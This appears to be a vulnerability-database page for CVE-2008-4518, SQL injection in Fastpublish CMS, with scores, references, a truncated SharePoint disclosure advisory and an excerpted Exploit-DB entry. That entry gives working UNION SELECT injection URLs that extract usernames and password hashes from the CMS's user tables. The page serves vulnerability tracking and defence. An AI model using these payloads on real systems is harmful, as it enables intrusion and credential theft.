CVE-2008-4518
Published 2008-10-09
Priority: P3 (40) | high | 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.00% (58.5th percentile)
Multiple SQL injection vulnerabilities in Fastpublish CMS 1.9.9.9.9 d (1.9999 d) allow remote attackers to execute arbitrary SQL commands via the (1) sprache parameter to index2.php and the (2) artikel parameter to index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fastpublish | fastpublish_cms | — | — |
| fastpublish | fastpublish_cms | — | — |
No detection rules found.
Exploit-DB
CVE-2009-3830: SharePoint 2007 - Team Services Source Code Disclosure
exploitdb · 2009-10-26
---
Summary
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Systems Affected: SharePoint 2007 (12.0.0.6219, 12.0.0.4518 and
possibly others)
Risk: Medium
Status: Reported
TimeLine
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009
Description
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.
It was found that the download facility of Mic
Exploit-DB
CVE-2008-4519: Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection
exploitdb · 2008-10-05
---
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection
SQL Injection
Exploit 1:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*
Exploit 2:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*
Exploit 3:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_
No writeups or analysis indexed.
References
http://secunia.com/advisories/32126
http://securityreason.com/securityalert/4383
http://www.securityfocus.com/bid/31582
https://exchange.xforce.ibmcloud.com/vulnerabilities/45671
https://www.exploit-db.com/exploits/6678